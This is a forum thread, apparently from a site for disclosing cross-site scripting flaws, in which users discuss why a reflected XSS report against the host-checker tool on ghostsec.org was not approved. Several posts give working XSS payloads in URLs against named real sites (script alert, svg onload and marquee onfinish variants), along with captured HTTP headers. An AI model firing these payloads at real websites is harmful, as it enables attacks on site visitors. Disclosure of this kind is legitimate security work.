Page 1 of 1

ghostsec.org submission not being approved

Posted: Fri Dec 11, 2015 1:07 pm
by ret2libc
this is a weird one to replicate, when you try it via GET it will give a 'not allowed' message
http://ghostsec.org/server.php?job=host ... Fscript%3E

could you test this manually by going to ghostsec.org -> tools -> host checker -> <script>alert('XSSPOSED')</script> as input
this definitely works.

also if someone can tell me how exactly i'd go about submitting this, that would be useful. here is the output from live http headers:

Code: Select all

m@m:~/Desktop$ cat header
http://ghostsec.org/server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E

GET /server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E HTTP/1.1
Host: ghostsec.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://ghostsec.org/
Cookie: 300gpBAK=R4178759823; 300gp=R394679152; PHPSESSID=b8b6865f79f7faf1c9ca1e129eb35fbc
Connection: keep-alive

HTTP/1.1 200 OK
Set-Cookie: 300gp=R394679152; path=/; expires=Fri, 11-Dec-2015 14:01:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Encoding: gzip
Transfer-Encoding: chunked
Date: Fri, 11 Dec 2015 12:58:38 GMT
Connection: keep-alive
X-Geo: varn35.rbx5
X-Geo-Port: 1011
X-Cacheable: Not cacheable: no-cache
----------------------------------------------------------
m@m:~/Desktop$ 

Re: ghostsec.org submission not being approved

Posted: Fri Dec 11, 2015 6:32 pm
by R3NW4
i have the same problem :( with:
http://moonsy.com

Re: ghostsec.org submission not being approved

Posted: Sat Dec 12, 2015 6:11 am
by x1admin
ret2libc wrote: could you test this manually by going to ghostsec.org -> tools -> host checker -> <script>alert('XSSPOSED')</script> as input
this definitely works.
cant reproduce

Re: ghostsec.org submission not being approved

Posted: Sat Dec 12, 2015 9:25 am
by Spam404Online
Maybe submit the following URL -

Code: Select all

http://ghostsec.org/server.php?job=hostCheck&u=%22%3E%3Csvg%2Fonload%3Dprompt(%2FXSSPOSED%2F)%3E
I would submit that and then if they got in touch it would likely result in a fix on the method to code execution you described :)

Re: ghostsec.org submission not being approved

Posted: Sat Dec 12, 2015 7:16 pm
by mradamdavies
Works here:

Code: Select all

http://microderp.com/?&1=1 <marquee loop=1 width=0 onfinish=1/prompt`/XSSPOSED/`>derp</marquee>
Image

May need to set referer or something as clean session shows "not allowed"

Re: ghostsec.org submission not being approved

Posted: Sat Dec 12, 2015 9:53 pm
by ret2libc
Yea that's the issue I'm getting with the 'not allowed' thing. Pretty sure that's why it isn't being accepted even tho it alerts fine for me at first

Re: ghostsec.org submission not being approved

Posted: Sat Dec 12, 2015 10:29 pm
by mradamdavies
ROFL:

Code: Select all

http://i.imgur.com/lQ1VMLU.png

Re: ghostsec.org submission not being approved

Posted: Sun Dec 13, 2015 4:19 pm
by ret2libc
I stil don't see how the admin was unable to manually reproduce this, works fine for me.